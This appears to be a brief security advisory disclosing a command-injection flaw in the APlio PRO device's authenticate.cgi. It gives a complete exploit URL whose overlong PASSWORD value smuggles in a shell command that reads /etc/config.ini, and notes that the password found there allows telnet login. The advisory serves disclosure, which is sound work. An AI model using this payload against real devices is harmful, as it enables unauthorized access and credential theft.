|
Vulnerability APlio PRO Affected APlio PRO Description Anthony Pardini found following. This URL allows for the execution of commands via /bin/sh: http://ip/cgi-bin/authenticate.cgi?PASSWORD=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx010110101010101010101010110101010101010101010101010101010101010101010101010110101010101010298347019283740918273409182734091872340981723409871230498712309847109283740192834709128734091827340987123409XXcat%20%2Fetc%2Fconfig.ini After this you can telnet in by using the passwd in the config file... They must setup this feature as there doesn't seem to be a default password and there must be a password to login. Version: uClinux release 2.0.33, build #1 Wed May 31 11:55:22 CEST 2000 uClinux/Aplio release 1.1.16, build # Wed May 31 11:57:37 CEST 2000 Solution Nothing yet.